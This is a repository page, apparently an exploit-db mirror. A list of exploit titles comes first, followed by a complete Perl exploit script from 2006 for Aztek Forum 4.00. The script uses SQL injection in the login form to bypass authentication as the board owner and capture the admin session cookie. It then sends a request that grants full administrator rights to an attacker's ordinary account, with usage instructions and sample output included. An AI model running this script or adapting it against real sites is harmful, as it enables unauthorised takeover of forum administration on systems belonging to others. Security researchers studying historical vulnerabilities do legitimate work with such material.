477bcbdcc0
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
116 lines
3.6 KiB
Perl
Executable file
116 lines
3.6 KiB
Perl
Executable file
#!/usr/bin/perl
|
|
use IO::Socket;
|
|
# Aztek Forum 4.00 Change User Rights Remote Exploit
|
|
#
|
|
# only if the magic_quote are : OFF <<<<<<<<<<<<<<<<<<<<<<
|
|
#
|
|
# Hum hum , sorry for my bad english i'm french ;)
|
|
# Note : Before using this exploit you must create a count on the board :)
|
|
# And this count will receive the administrator
|
|
# rights !
|
|
# aztek_gar.pl <host> <path> <board_owner> <user>
|
|
# aztek_gar.pl 127.0.0.1 /aztek/ Admin Attacker
|
|
#
|
|
#
|
|
#+------------------------------------------------------------+
|
|
#- Aztek 4.0 Give Admin rights to a normal user -
|
|
#-
|
|
# -
|
|
#- coded by _Sparah_ -
|
|
#+-----------------------------------------------------------+
|
|
#
|
|
# [~] Connection to 127.0.0.1 on port 80 ...
|
|
#
|
|
# [+] CoOkie : ATK_ADMIN=6688f12bf61a432c22e38c46a194e6ea
|
|
#
|
|
# [!] D0ne !
|
|
|
|
# var
|
|
$host = $ARGV[0];
|
|
$path = $ARGV[1];
|
|
$owner = $ARGV[2];
|
|
$user = $ARGV[3];
|
|
|
|
#banner
|
|
if (@ARGV<4) {
|
|
print q(
|
|
|
|
+--------+
|
|
| banner |
|
|
+---------------------------------------------+
|
|
|Aztek 4.0 Give Admin Rights to a normal user |
|
|
| |
|
|
| by _Sparah_ |
|
|
+---------------------------------------------+
|
|
-=[X]=-
|
|
+---------------------------------------------+
|
|
| http://www.eos-team.be/ |
|
|
| http://sparah.next-touch.com/ (soon) |
|
|
+---------------------------------------------+
|
|
-=[X]=-
|
|
+---------------------------------------------+
|
|
| Usage : |
|
|
| |
|
|
| *.pl <host> <path> <board_owner> <user> |
|
|
| ex : 127.0.0.1 /aztek/ Admin Attacker |
|
|
| |
|
|
+---------------------------------------------+
|
|
| E.o.S|
|
|
+------+
|
|
|
|
);exit();}
|
|
|
|
print "
|
|
|
|
+----------------------------------------------+
|
|
- Aztek 4.0 Give Admin rights to a normal user -
|
|
- -
|
|
- coded by _Sparah_ -
|
|
+----------------------------------------------+
|
|
|
|
";
|
|
|
|
print "\n[~] Connection to $host on port 80 ...\n";
|
|
|
|
#1st request
|
|
$req1= "login=".$owner."%27%23&passwd=";
|
|
$len1= length $req1;
|
|
|
|
$send = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort
|
|
=> "80") || die "\n[-] Connection failed...";
|
|
print $send "POST ".$path."myadmin.php?action=login HTTP/1.1\n";
|
|
print $send "Host: $host\n";
|
|
print $send "Cookie: ATK_PASSWD=; ATK_LOGIN=nobody; ATK_SESS=\n";
|
|
print $send "Content-Type: application/x-www-form-urlencoded\n";
|
|
print $send "Content-Length: ".$len1."\n\n";
|
|
print $send "".$req1."\n";
|
|
|
|
# take cookie value
|
|
while(chomp($cookie=<$send>))
|
|
{
|
|
if ($cookie =~ /Set\-Cookie\: (\S+)/)
|
|
{
|
|
$ATK=$1;
|
|
close($send);
|
|
}
|
|
}
|
|
|
|
print "\n[+] CoOkie : ".$ATK."\n";
|
|
|
|
# 2nd request
|
|
$req2 =
|
|
"login=".$user."&priv%5B%5D=0&priv%5B%5D=1&priv%5B%5D=4&priv%5B%5D=2&priv%5B%5D=3&priv%5B%5D=5";
|
|
$len2 = length $req2;
|
|
$data = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort
|
|
=> "80") || die "\n[-] Connection failed...";
|
|
print $data "POST ".$path."myadmin.php?action=admin&choix=6 HTTP/1.1\n";
|
|
print $data "Host: ".$host."\n";
|
|
print $data "Cookie: ".$ATK."\n";
|
|
print $data "Content-Type: application/x-www-form-urlencoded\n";
|
|
print $data "Content-Length: ".$len2."\n\n";
|
|
print $data "".$req2."\n";
|
|
read $data,$res,9000;
|
|
print $res;
|
|
print "\n[!] D0ne !\n\n";
|
|
|
|
# milw0rm.com [2006-03-26]
|